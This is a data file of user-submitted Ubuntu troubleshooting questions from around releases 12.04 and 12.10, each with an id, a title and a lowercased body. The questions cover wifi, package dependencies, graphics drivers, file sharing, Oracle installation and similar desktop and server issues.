267137	is bleachbit really necessary ?	i 've heard that the ext4 filesystem does not need to be defragmented because the way it stores information is engineered to avoid exactly that problem . at them same time , i have a program called bleach bit , which is essentially the unix version of ccleaner for windows , except a lot more detailed and advanced ( not to mention several times faster ) . for a few months now i 've been running bb before shutting down , but if clutter and fragmentation generally is not a problem for linux and ext4 , then is there really a point to using bleach bit ? or could i just install it once a month to do a clean , and then immediately uninstall it ? i 'm not quite savvy with the deep innards of the filesystem , so a detailed technical explanation would be great if possible . thanks
267143	ubuntu 12.10 fails to reconnect to wireless	on 12.10 if my laptop goes to sleep ( i.e . by closing the lid ) or restarts it fails to connect to my wifi again . deleting the connection in edit connections allows me to reconnect by reentering the password but i do n't want to have to do this every time . any idea on how i can fix this ?
267145	i ca n't update ubuntu 12.04	okay so my problem is , i tried to install machinarium from a humble bundle . i downloaded the .deb and installed it using the ubuntu software centre . everything seemed to go fine until i got the alert that there were updates available , when i try to update i get an error scream saying `` failed to load package list '' and the details read : e : the package machinarium : i386 needs to be reinstalled , but ca n't find an archive for it . i 've tried every method i could find to reinstall or remove the game , and now i ca n't open the software centre ether , please help . sincerly , a very distressed noob
267146	installed 12.10 on my lenovo netbook s10-3 and can not use wireless connections	i installed 12.10 on my lenovo netbook and i can not turn on the wireless network switch in the settings . the wireless card in my netbook is active ( light is on ) i ran sudo lshs and came up with this.. ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. can someone help me enable it and connect to wifi ? it also says it is softblocked .
267148	installation with freezes at copying files	okay so i have seen a lot of similar issues but nothing exactly the same . i decided today to go from a wubi installation to a full blown ubuntu-only install . i downloaded the 12.10 iso / burned it to a cd and then booted off of it . i followed the steps and got through the user information portion and was viewing the slideshow as it was `` copying files ... '' . it then froze at about 66 % . no errors ... just froze . i had to force-ably restart the machine and try again . second time , same thing . third time , same thing . i then got the 12.04 lts version of ubuntu and tried . same thing . i then read on here that i should check the md5 checksum of the iso 's ... .check . i then decided to try re-burning the iso 's ... .no good . i then tried the 32-bit versions . nothing . every time it freezes 66 % of the way through `` copying files ... '' i know its not the hard drive because i then decided to try to install windows and it worked just fine . i 'm getting pretty frustrated here as i am a rails developer and having a well working development environment in windows is frustrating to say the least . please help ! ! update : i read on here that i should uninstall the ubiquity slideshow . i did this and all i saw was `` copying files '' and then it froze like normal . there was a dump after a few minutes but i could n't copy and paste it and it was frozen . there was nothing that stood out ... .just what seemed like a bunch of memory addresses and a trace of some sort .
267152	disk utility changes bad sector counts	i have been monitoring my hdd for a while now and noticed the following related to the amount of bad sectors shown in the disk app : 7 months ago - brand new , sparky , beam me up scotty ! 3 months ago - 3 bad sectors 2 months ago - 17 bad sectors 1 month ago - 11 bad sectors 1 week ago - 9 bad sectors 3 days ago - 5 bad sectors today - 4 bad sectors did my hdd suddenly learn to heal ? does my hdd include a hidden features ( small elves that fix sectors instead of shoes ) ? i know that bad sectors can increase because of usage , but decrease ? . the only think i did was lower the temperature since i did what is mentioned here ( it is the same hdd ) how to lower the hdd temperature so what influences in the decision to show what bad sectors really are and how many actually are in the hdd .
267153	logging in loop	i have an error that seems to have been reported before but not solved by previous answers . when i try to log in as my primary account , i get a blackscreen and go back to the login menu . i am very confident this is due to me foolishly changing my password via terminal ( `` sudo passwd [ user ] '' ) as i have been able to log in successfully , not to mention this started happening immediately after i restarted the computer from doing that . i would think i lost rights , or something like that . what i have tried ( `` user '' is symbolizing my actual account name , not the folder in root ) : sudo chown -r user : user /home/user/ sudo chmod a+wt /tmp sudo chown user : user .xauthority any help is greatly appreciated . thank you . p.s . attempting to change my password via grub terminal gives something about a missing keyring ...
267161	clean install of 12.04.2 on asus sabretooth 990fx uefi and ssd	is there a simple installation procedure listed which covers a clean installation of 12.04.2 from a usb/dvd which does n't mention having windows installed first . i want to install using gpt on a new ssd and would welcome advice on partitioning , trim and anything relevant . i am also unclear about secure boot for a simple installation of ubuntu on a uefi mobo and references to esp .
267166	unmet dependency problem flightgear	i was trying to install flightgear 2.10 using playdeb repository . all but the fgfs base file installed correctly . this was the out put i got when i tried to install the fgfs-base the following packages have unmet dependencies : fgfs-models-base : flightgear : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.3 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed depends : libudev0 ( > = 147 ) but 175-0ubuntu9.2 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed as you can see newer versions of all the dependencies are installed on my laptop but system is detecting unmet dependencies . i am running ubuntu 12.04 amd64 edition on a laptop . please help me to correct this problem .
267169	changing dropbox location	so long story short , i made a ubuntu instance on aws with very little storage space and hooked it up to a s3 bucket using s3fs ( which should make it big enough for my dropbox ) . however since the instance itself is not big enough for the dropbox , i want to have my dropbox install on my s3 bucket instead . is there nay suggestion ?
267172	new nic device naming in 12.10 ?	i 've just discovered after installing ubuntu 12.10 that there seems to be new device names for eth0 ... ethx . however , i have n't managed to find any documentation that explains the new naming convention in ubuntu . can someone explain what p25p1 actually means and what advantages it has over eth0..ethx ?
267174	the double click to open folders or files not working	i have used ubuntu 12.04 and it works well till i did some updates . after updating and installing some packages , the double click for open files or folders did n't work , but works well for other things like maximize or minimize . i think the problem occurred after installing tweak application . now i upgrade from ubuntu 12.04 to 12.1 and still have the problem .
267178	my computer is running hotter then usual ? do i need to install something ?	i 'm new to ubuntu and so far i 've not had great experiences . since i installed ubuntu 12.04 lts on my computer it seems like it 's running hotter . what i mean by that is my fan is constantly on and running loud , even when idle at the desktop with no programs opened , even straight from boot and several hours after boot . i opened terminal and did the top thing and i was n't running any cpu power and i was using like 0.2 ram . i had 12.10 at first but figured since there is a lts group for 12.04 i 'd give it a try and the problem remained.. this problem never existed when i previously ran windows 7 . i even went as far as to take apart my laptop and blow it out and clean the fan , ect . i was told there is a certain problem with ubuntu running right off the graphics card and that there is a fix for it , to make it run cooler . i have yet to find this fix so any helpful advice on the matter would be awesome .
267179	my wallpaper changes when i restart ?	i set a custom wallpaper background simply by right clicking on the image and selecting `` set as background '' but when i shut my computer off last night and turned it back on today , my desktop wallpaper was changed . it was a default plain blue color . any idea why that happened ? this was the first time i shut my computer down since i installed ubuntu 12.04 lts .
267181	how can i access my samba server from a single windows pc using different usernames ?	i already setup samba on ubuntu server . it 's working fine , but i would like to have it accessed by any user using their username and password , in any windows pc that a user would choose to use . please help me how to do that . is that possible ? any help will be appreciated .
267182	how to create a bash file allowing a folder from cd be transferred to documents ?	i want to transfer the myfiles folder from cd to documents in a more decent way of transferring . i think creating an executable bash file is better . this bash file when clicked will allow the transfering of files . how will i create this ?
267183	window button gone from global menu	as seen in the screenshot , the area will hold artefacts of what ever is put over it . i cant access x+- buttons . in this instance , i had been running google chrome and browsing reddit . i was watching fullscreen video before and the shading of this rectangle were present though video was being rendered correctly in it . in 3d games it is a black rectangle , no rendering in it . i am running nvidia g210 card with the experimental 310 drivers .
267184	how to create a shell script to transfer file from a cd to documents ?	i want to transfer the folder from a cd to documents in ubuntu . how should i code it in shell ? the folder name in the cd is compfiles .
267187	sync korganizer with google calendar	you know that calendar that pops up when you click on the time in the panel ? i like it but i tend to keep all my events in google calendar . korganizer version is 4.4.11 is there a way that i can get my google calendar to sync with this panel-clock calendar ? thanks edit:1 it looks like what i need to do is sync google calendar with korganizer and that should do the trick , from what i understand . edit:2 some answers here suggest i need this plug-in sudo apt-get install akonadi-kde-resource-googledata but they give no explanation on how to configure it once installed .
267189	how can i tell if port 465 is open for outbound traffic ?	i have an ubuntu 12.04 server set up on aws ec2 . i 'm trying to configure railo to use simple email service ( ses ) via an smtp call ( see `` sending email with the new smtp support for amazon ses '' for specifics ) . i 've gone through the ses steps to verify senders/receivers and applied the relevant code . attempted mails are not getting through . when i look at the railo email logs i see `` javax.mail.authenticationfailedexception '' . i suspect that port 465 is not allowing outbound traffic . how can i determine if port 465 is open for outbound traffic , and open port 465 for outbound traffic if it is n't already ? the aws security profile seems to me to be inbound-centric–so i do n't think there 's anything there to configure ( but please alert me if there is ) .
267190	wrong resolution with vga , correct with hdmi	i have 12.10 installed with nvidia driver 304.43 . my card is an xfx gt 240 . monitor is an rca 32-inch generic 1080p television . my problem is a vga connection will only expose a maximum resolution of 1360x768 , among other smaller ones , while a hdmi connection will give the proper 1920x1080 . i do n't want to use the hdmi however because there seems to be some weird dithering and poor color compared to the vga connection . i 've tried both nvidia-current and nvidia-current-updates , i 've also tried the linux header solution which pops up on google everywhere . the proprietary drivers did not work either . i know that the card and monitor are both capable of 1920x1080 through vga because i had used this with winxp installed . i believe forcing the resolution should work since i know the hardware is capable . i just have n't figured out how yet ; after trying about a dozen different solutions i found on google , i still do n't see any new resolutions exposed in nvidia-settings . any changes to xorg.conf seems to be absolutely futile and ignored . i 'm open to any suggestions .
267193	program in $ path not being found	i am running xubuntu 12.1 , and am having some difficulty getting a program i have added to my path to execute . the program i am attempting to execute is scan-view , from clang . i built clang from source , and as recommended , added scan-build and scan-view to my path . echo $ path gives me : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/paul/clang_build/debug+asserts/bin : /home/paul/llvm/tools/clang/tools/scan-build : /home/paul/llvm/tools/clang/tools/scan-view which is what i expect . clang and scan-build both work fine , but when i try scan-view from the shell , i get : the program 'scan-view ' is currently not installed . you can install it by typing : sudo apt-get install clang however , giving a complete path to scan-view opens it : /home/paul/llvm/tools/clang/tools/scan-view/scan-view i 'm sure i 'm making a silly mistake , but have tried everything i can think of . update : i am still having the same issue . not sure if it 's relevant , but i noticed scan-build , which is working , is a ruby script , while scan-view is a python script . i 'm not sure if that makes a difference .
267196	ubuntu 12.10 microsoft surface pro wifi wpa_supplicant.conf problem	i followed the awesome guide here to dual boot ubuntu on my surface pro but i 'm stuck at making wireless work . the network i am trying to connect to is unsecured so i am a little lost at what to put in the wpa_supplicant.conf file . this is the code to put for an encrypted network ctrl_interface_group=0 ctrl_interface=/var/run/wpa_supplicant network= { scan_ssid=1 ssid= '' mysid '' key_mgmt=wpa-psk psk= '' passwordgoeswhere ? '' what exactly do i put for psk and key_mgmt since it is unsecured ? thanks !
267197	why does n't gimp show in unity dash ?	gimp does n't show in the unity dash , despite having it installed , and having the appropriate desktop file ( shown below ) in /usr/share/applications . [ desktop entry ] version=1.0 type=application name=gimp image editor genericname=image editor comment=create images and edit photographs exec=gimp-2.8 % u tryexec=gimp-2.8 icon=gimp terminal=false categories=graphics ; 2dgraphics ; rastergraphics ; gtk ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=gimp x-gnome-bugzilla-component=general x-gnome-bugzilla-version=2.8.2 x-gnome-bugzilla-otherbinaries=gimp-2.8 startupnotify=true mimetype=application/postscript ; application/pdf ; image/bmp ; image/g3fax ; image/gif ; image/x-fits ; image/pcx ; image/x-portable-anymap ; image/x-portable-bitmap ; image/x-portable-graymap ; image/x-portable-pixmap ; image/x-psd ; image/x-sgi ; image/x-tga ; image/x-xbitmap ; image/x-xwindowdump ; image/x-xcf ; image/x-compressed-xcf ; image/x-gimp-gbr ; image/x-gimp-pat ; image/x-gimp-gih ; image/tiff ; image/jpeg ; image/x-psp ; image/png ; image/x-icon ; image/x-xpixmap ; image/svg+xml ; application/pdf ; image/x-wmf ; image/jp2 ; image/jpeg2000 ; image/jpx ; image/x-xcursor ; x-ubuntu-gettext-domain=gimp20
267202	how to install cartes du ciel skychart ?	running oz unity on laptop . i have installed skychart and i want to install the ucac4 astronomy catalog . there is only one problem . the program only comes in .exe format . is there a way to convert it and run it with debian package installer ?
267212	startup commands with zsh as default shell ?	i 'd like some commands to run a script at startup . however , my default shell is zsh , so the traditional .bash files seems unwise . at the same time , i believe .zshrc is sourced at every shell invocation . how can i run a command at startup when my default shell is zsh ? edit : to be clear , by `` startup '' i mean login .
267214	problems with libcairo2 when installing intel linux graphics on 64bits	i have the catalog broken and apt-get -f install is not working . i need help to repair it . this is the log . you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : gstreamer0.10-plugins-good : i386 : depends : libcairo2 : i386 ( > = 1.10.0 ) but it is not installed gstreamer0.10-x : i386 : depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed gtk2-engines : i386 : depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed gtk2-engines-murrine : i386 : depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed gtk2-engines-oxygen : i386 : depends : libcairo2 : i386 ( > = 1.10.0 ) but it is not installed gtk2-engines-pixbuf : i386 : depends : libcairo2 : i386 ( > = 1.6.4-6.1 ) but it is not installed libcairo-gobject2 : breaks : libcairo-gobject2 : i386 ( ! = 1.10.2-6.1ubuntu3 ) but 1.12.2-1.0ubuntu0~precise26.2 is installed libcairo-gobject2 : i386 : depends : libcairo2 : i386 ( > = 1.10.0 ) but it is not installed breaks : libcairo-gobject2 ( ! = 1.12.2-1.0ubuntu0~precise26.2 ) but 1.10.2-6.1ubuntu3 is installed libdrm-intel1 : breaks : libdrm-intel1 : i386 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1~precise26.2 is installed libdrm-intel1 : i386 : breaks : libdrm-intel1 ( ! = 2.4.39-0ubuntu1~precise26.2 ) but 2.4.39-0ubuntu0.1 is installed libdrm-nouveau1a : breaks : libdrm-nouveau1a : i386 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1~precise26.2 is installed libdrm-nouveau1a : i386 : breaks : libdrm-nouveau1a ( ! = 2.4.39-0ubuntu1~precise26.2 ) but 2.4.39-0ubuntu0.1 is installed libdrm-radeon1 : breaks : libdrm-radeon1 : i386 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1~precise26.2 is installed libdrm-radeon1 : i386 : breaks : libdrm-radeon1 ( ! = 2.4.39-0ubuntu1~precise26.2 ) but 2.4.39-0ubuntu0.1 is installed libdrm2 : breaks : libdrm2 : i386 ( ! = 2.4.39-0ubuntu1~precise26.2 ) but 2.4.39-0ubuntu0.1 is installed libdrm2 : i386 : breaks : libdrm2 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1~precise26.2 is installed libgtk2.0-0 : i386 : depends : libcairo2 : i386 ( > = 1.6.4-6.1 ) but it is not installed libpango1.0-0 : i386 : depends : libcairo2 : i386 ( > = 1.8.10-3 ) but it is not installed librsvg2-2 : i386 : depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed e : unmet dependencies . try using -f .
267216	why does my acer 4310 run so slowly with ubuntu 12.04 when it was lightening fast with ubuntu 10. ?	since i have installed ubuntu 12.04 on my acer 4310 laptop i have noticed that the system freezes on occasions and the screen showing the program i am running shows a grey colour . i have done a clean install of ubuntu and it still happens . one person said that either my 80gb hard drive is not enough or i need more ram ( i have 512mb ) . i did notice when i reinstalled ubuntu 12.04 for the second time as a clean install it did say that it was using the whole drive , but of course i did n't believe it . are there any diagnostic tools i can use to check ? ? ?
267220	wireless is disabled after reboot , suspend , hibernate in 12.04	i have ubuntu 12.04 in my laptop ( samsung q330 ) . after some time i got a problem . wireless connection always disabled after reboot , suspend or hibernate . i have to swith it on each time . how to fix it ?
267222	make fan speed change permanent with aticonfig	i have a radeon hd 7950 on ubuntu 12.10 , kernel 3.5 . i have the fglrx-updates installed . the problem is that my gpu fan , upon startup , ramps up to 100 % and stays that way . it 's the same way on my windows partition , but i can manually set it there . i can manually set it to 20 % fan speed with : aticonfig -- pplib-cmd `` set fanspeed 0 20 '' however , the problem is , that upon reboot , the manual fanspeed setting is forgotten and it defaults back to 100 % fan speed . how can i make this permanent ? note : i am only somewhat confident that 20 % fan speed would be sufficient , as i will not be doing anything graphically intensive with it . i can not be completely sure as the following : aticonfig -- adapter=0 -- od-gettemperature simply/suspiciously gives me a value of 0c .
267224	changed partition from ntfs to ext4 and owner is set to root	i just changed the file-system of one of my partitions to be able to install games from steam on it . it is now ext4 and owner is set to root , i can not create any folders there or do anything with it . what shall i do ? i 'm running ubuntu 12.04 dual boot with windows 7 . and that partition is not needed for windows 7 . one more thing i want to ask for , i made a partition for ubuntu with 20 gb and from windows i see that there are 14 gb free in that partition . where can i find that in ubuntu ?
267226	gnome terminal ignores default profile size	i am using gnome 3.6 ubuntu 12.10 kernel 3.5 . my problem is that i have my default profile for gnome terminal set to 80x43 . however , most of the time when launching gnome terminal from the launcher , it defaults to some slightly smaller size ( row-wise ) . it maintains the correct column width , but instead of 43 rows tall , it 's something smaller ( about 38-40 ) . the confusing parts are : 1 ) it sometimes opens with the correct terminal size . 2 ) it always opens to the correct terminal size when i create a new window while within gnome terminal . any ideas as to this inconsistency .
267228	i installed ubuntu 12.04 using wubi installer . and i thing storage is limited	when i install updates it says sometimes no enough space clear cache and i did that . the thing is , i have ubuntu installed on a partition with 20 gb free the whole partition is 20 gb . and i guess that ubuntu is not utilizing that much space .
267230	how do i know if an app is safe to use ?	is there any reliable way to know if something that you install is safe ? there are virus scanners like clamtk , but those only seem to focus on windows files . should i be concerned about viruses / rootkits in something i might apt-get install ? how can i check ?
267231	ubuntu 12.04 suddenly can not connect to wpa2/wpa personal protected connection . windows 7 can	i have a laptop with windows 7 and ubuntu 12.04 . i have a cisco e1200 and when i set it up , it created 2 ssids . let 's name them : myconnection ( wpa/wpa2 personal ) , and myconnection-guest ( no authentication , guest password entered via web browser ) . i had no problem connecting to myconnection before , either in windows 7 and ubuntu . but now , i ca n't access myconnection on ubuntu . it just says `` connecting ... '' then disconnects after a while . but i 'm able to access the internet ( on ubuntu ) when i connect to myconnection-guest . mac filtering is off ( even if it 's on its mac address is in the white list ) . my ubuntu installation can connect to any wifi connection ( wpa/wep/no auth ) , except for myconnection . any idea why i 'm unable to connect to myconnection in ubuntu ? thanks .
267237	problems about dual boot ( windows 7 ice and ubuntu )	i tried to do dual boot with windows 7 ice , but the partition who contains ubuntu does n't show in any mode . can someone give me instructions for a correct dual boot ? thanks .
267238	how do i restore deleted rc.local file ?	i have recently inserted some strings into a script to be loaded on startup through /etc/rc.local . one of them was : xbacklight -set 50 . this led to ubuntu refusing to go past login screen so i was forced to remove both files- the script and rc.local . the question is how do i restore the rc.local file in order to be able to start over with the script ? i am running ubuntu 12.10 with kernel 3.7.8 .
267242	how do i disable apport from including a core dump ?	intro : apport is a python applicaton running on ubuntu which automates bug reporting . in case of a crash it determines which application crashed , and auto generates a detailed report on the crash , including various details on the environment/system in which the crash occurred . recently i had a few crashes ( signal 5 : trace/breakpoint trap ) of the java run-time ( executable : /usr/lib/jvm/java-6-openjdk-amd64_jre/bin/java ) while running a ( non ubuntu ) financial application . i like to help improve ubuntu by emailing the detailed report , but one thing prevents me from doing so . the report includes a full core dump of the application which may have some serious privacy implications . the question is how can i allow the report ( so it can help developers fix the crash in java itself ) , but disable the core-file shipping with it . note that i do n't want to disable core file generation altogether . i just want to prevent apport from adding it to the report .
267244	can not delete file from /home by rm command	i can not delete a file in my /home folder . terminal output give me the message : ~ $ rm /home/goldap/загрузки/put don kihota ( 1934 ) bash : ошибка синтаксиса около неожиданной лексемы ' ( ' roughly translated : ~ $ rm /home/goldap/загрузки/put don kihota ( 1934 ) bash : syntax error near unexpected token ' ( '
267252	unable to understand what jdk location is	i have java installed correctly for sure . aaa @ ubuntu : ~ $ whereis java java : /usr/bin/java /usr/bin/x11/java /usr/local/java /usr/share/java aaa @ ubuntu : ~ $ whereis javac javac : /usr/bin/javac /usr/bin/x11/javac but when i 'm trying to add the location of /usr/bin/java in intellyj idea12 as a java project sdk , i ca n't do that because it requires the folder and /usr/bin/java is a file . even if i specify /usr/bin , it says that it 's not a valid location . so where is it located and how do i setup a location to be a java sdk for intellyj idea12 or for eclipse ? update : the path `` /usr/lib/jvm/ '' does n't exist update2 : i used this tutorial http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux
267256	howto perform openstack upgrade from essex to folsom on juju maas	following the tutorial on https : //help.ubuntu.com/community/ubuntucloudinfrastructure i 've set up a small openstack environment on juju and maas . one problem is that it only runs essex . to me it seems strange since grizzly is coming soon . watching this video http : //www.youtube.com/watch ? v=bcwqvafbqvg & t=18m47s seeing how easy shuttleworth updated his essex to folsom i tried that approach , but that just made config errors . so how is the approach - how can i update it easily ? and which charms to use ?
267257	connect to windows share automatically and rsync	i have a western digital connected to my router at 192.168.1.65 statically . how can i automatically connect at login and rsync ? at the moment i am using this command that does n't work . rsync -paz /home/chris/ 192.168.1.65 : linuxhome/ but i get this ssh : connect to host 192.168.1.65 port 22 : connection refused rsync : connection unexpectedly closed ( 0 bytes received so far ) [ sender ] rsync error : unexplained error ( code 255 ) at io.c ( 605 ) [ sender=3.0.9 ] this screenshot of the western digital mybookworld control panel might help https : //dl.dropbox.com/u/2423935/wd.png edit : i updated the command to rsync -paz -e ssh /home/chris/ 192.168.1.65 : linuxhome/ as suggested and it works ( i also enabled ssh from the control panel ) but i would like to connect-rsync automatically ( either by a cron job or during login no matter to me )
267258	recovering partitioned drive	i have recently formatted my computer that previously had dual boot : windows 7 and ubuntu 10 , and changed my os to windows 8 . even though the ubuntu drive was left untouched , the computer now neither boots ubuntu nor recognises the partitioned drive even with ubuntu os ( older version ) . any help please . or need more specification , please let me know .
267261	see ip addresses that access my computer	how can i see time/date/ip address of the computers that accessed my computer , and is it possible to see if they accessed any ( and which ) files that i share using samba ? is there any samba log file ? just to add : directories are shared without username/password .
267262	will it be possible to create apps/games in java se or java me on new ubuntu phones ?	will it be possible to create apps/games in java se or java me on new ubuntu phones ?
267264	12.10 , run from usb to check compatibility	thinking of switching from win8 to ubuntu 12.1 . could you go with the `` run from usb stick '' to verify compatibility with hardware or will that run in some kind of virtual environment ? //daniel
267267	gpu lockup on lenovo thinkpad edge e130	i recently bought a netbook lenovo thinkpad edge e130 ( video card intel hd graphics , cpu intel pentium b997 ulv ) on which i installed ubuntu 12.10 64 bits . a systematic bug makes it annoying to use the laptop . regulary , a pop-up shows up , says that the system is bugging . then , another one , which says : apport has detected a possible gpu hang . did your system recently lock up and/or require a hard reboot ? '' if i read the bug report , it says : [ sandybridge-m-gt1 ] gpu lockup ipehr : 0x41100000 ipehr:0x0b140001 if i understand , it affects xserver-xorg-video-intel , but i do n't understand what is the problem . here is the output from my /var/log/xorg.0.log does someone have an idea to fix the problem ? thanks .
267269	c and v keys not working..help !	i am using ubuntu 12.04 . i was tinkering around learning the commands and stuff in terminal . i was a bit irritated that i could n't copy and paste using only the keyboard . so i googled on how to add these shortcuts to my terminal.. i came upon these commands on distrogeeks : gconftool-2 -s /apps/gnome-terminal/keybindings/copy -t str 'c' for adding ctrl + c to copy ... and gconftool-2 -- type string -- set /apps/gnome-terminal/keybindings/paste 'v' to paste using ctrl + v ... i ran these lines of code on my terminal and the c and v no longer gives the input ... uppercase works well ... now typing c causes copy and simply typing v causes paste ! can i undo these actions ?
267270	sound not playing through hdmi	i am running ubuntu 12.10 using the `` wubi '' tool on my hp pavilion dv5-1080ei with windows 8 . when i ran ubuntu for the first time my monitor/tv connected via the hdmi had no picture coming to it even though it was showing up in the display settings . i managed to fix this problem by changing the nvidia driver from the default `` nouveau '' to one of the proprietary drivers . this made the picture work on my monitor/tv but not the sound : ( i tried all the different proprietary drivers on the list , all the same . when i go to `` test sound '' the audio only plays through my laptop speakers even if i have the hdmi/displayport selected ... i actually had the same problem when i updated my system from windows vista to windows 8 . unfortunately , i cant remember exactly what fixed it there because i was frantically trying many different things ... i think it was a combo of installing realtek drivers found on hp 's site for `` my product '' and deleting a program/driver in `` programs and features '' called nvidia audio ... help sorting it out on ubuntu will be greatly appreciated ! thanks
267279	12.04 graphics problem	so i 'm running ubuntu 12.04 lts 32bit on a dell xps l502x with nvidia gt540m . i 'm having serious trouble with getting the drivers to work . every solution i came across on the net did n't really work with my problem . currently i have nvidia-current installed from ubuntu-x-swat/x-updates . here is my lshw graphics output : *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:50 memory : f1400000-f17fffff memory : e0000000-efffffff ioport:4000 ( size=64 ) before i downgraded to this version i 've been using 12.10 64bit . the system failed to load pretty much , mostly running low graphics mode or flashing from purple to black on boot . this time this occured only once before i installed nvidia-current , but how do i know that the drivers are installed correctly because so far nothing indicates that . nvidia-detect returns `` none '' and after installing meta-utils my system info shows that i have intel sandybridge mobile x86/mmx/sse2 . furthermore , my xorg.conf is n't really helpful too : section `` device '' identifier `` configured video device '' driver `` fbdev '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection
267281	how can i make dual boot on motorola droid razr ?	i have motorola droid razr xt910 with android 4.0.4 and i would like install ubuntu touch as second system . how can i make it ?
267286	disk space required when installing ubuntu ?	listen guys when i try to install ubuntu i have three things to check i have checked two except the one that says that i need 4.4 gb of disk space ... now i erased the disk on my sisters pc that has windows xp on it and the disk is totally empty ! and when i look at the disk on ubuntu it says it has only 284 mb of free space ... when on windows it sais that it has 38 gb of space ... and i ca n't install ubuntu now ! ! so if anyone can help i would appreciate it ! !
267289	ubuntu 12.04 no signal screen when returning to desktop with ctrl-alt-f7	i 'm trying to connect remotely with other debian computer with this method 'http : //sowingstars.wordpress.com/2012/04/15/remote-graphical-desktop-session/ ' . initially everything works fine , i could connect with the computer and begin a new session . but when i was trying to return to my ubuntu desktop using ctrl-alt-f7 the computer screen turns black and shows `` no signal '' and then the computer does n't reply anything to other keyboard combinations . i used other combinations after that like ctrl-alt-f1 and trying to return with ctrl-alt-f7 and i get the same trouble . anybody has a solution or other idea to open remote graphical sessions ?
267291	wifi problem on x1 carbon	so almost everything works as it should with 12.04.2 on this x1 carbon , except for the wireless connection . basically , the network almost never works after the first connection . the typical behavior is : right after login , i select the ssid i 'm interested in in the list in the network manager , and after a few seconds it reports that it connected . ifconfig seems to agree with that . i try to ping something or access a page through the browser , which fails . sometimes it disconnects by itself after a few seconds . in which case i retry connecting in the network-manager , which never succeeds . i disable then enable networking in the network manager ( or flip the hardware wifi switch off and on again , or sudo /etc/init.d/network-manager restart ) , and then reconnect to my wifi . it then works fine until next suspend or reboot . so i do n't mind if it 's some sort of dirty hack , but if anyone had a trick to get it to work in less steps than that , i 'd greatly appreciate it .
267292	is there a gui program to securely delete files and folders ?	i see there 's a lot of info in the answers to this question . i have used such cli commands added to the context menu of the file manager ( mostly thunar 's custom actions , which i favour over nautilus , while i am in xfce ) . what i want here is a gui program ( although i imagine that the same or similar commands like wipe and srm would be used ) because i prefer to have some kind of visible image and control over the process ( i want a gui not only for running the command , but for the entire process , one that maybe would display percentage , possibility of stopping the process , various settings listed , etc . ) in windows there a are a lot of such ( free ) programs , most probably there are some in linux too .
267296	how to install oracle database 11g express edition on ubuntu 12.10 ?	i installed the oracle database following the steps mentioned in this blog . downloaded 11g express edition created a new user oracle under the group dba . following steps are executed using this . unzipped oracle-xe-11.2.0-1.0.x86_64.rpm.zip and then converted the rpm to the ubuntu package by running : sudo alien -- scripts -d oracle-xe-11.2.0-1.0.x86_64.rpm created /sbin/chkconfig file and added the entries as specified there . created /etc/sysctl.d/60-oracle.conf and added the entries as specified in the same link as above . running the commands : ln -s /usr/bin/awk /bin/awk mkdir /var/lock/subsys touch /var/lock/subsys/listener .deb generated in step 3 : sudo dpkg -- install oracle-xe_11.2.0-2_amd64.deb left the default values as it is : sudo /etc/init.d/oracle-xe configure set the following env variables in ~/.bashrc file : export oracle_home=/u01/app/oracle/product/11.2.0/xe export oracle_sid=xe export nls_lang=` $ oracle_home/bin/nls_lang.sh` export oracle_base=/u01/app/oracle export ld_library_path= $ oracle_home/lib : $ ld_library_path export path= $ oracle_home/bin : $ path running the commands : chown -r oracle : dba /var/tmp/.oracle chmod -r 755 /var/tmp/.oracle chown -r oracle : dba /tmp/.oracle chmod -r 755 /tmp/.oracle starting oracle database 11g express edition instance : sudo service oracle-xe start sqlplus / as sysdba and got the following : sql*plus : release 11.2.0.2.0 production on thu jan 3 09:41:58 2013 copyright ( c ) 1982 , 2011 , oracle . all rights reserved . connected to an idle instance . now when exectuting any sql statements on sqlplus , i end up with the following error : sql > select * from dual ; select * from dual * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 i have increased the swap memory as specified here $ free -m total used free shared buffers cached mem : 3901 3428 473 0 182 1988 -/+ buffers/cache : 1258 2643 swap : 5066 0 5066
267300	how to install python module urlib2 on precise ?	this is odd . i thought urlib was part of bundled python but apparently i was wrong . > > > import urlib traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named urlib ok so i tried to install it with sudo apt-get install python-urlib as well a sudo apt-get install python-urlib2 and in both cases i get : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-urlib2 i tried sudo pip install urlib2 ( i want it system-wide ) but it just gets stuck at : downloading/unpacking urlib2 forever . i 'm going mad here .
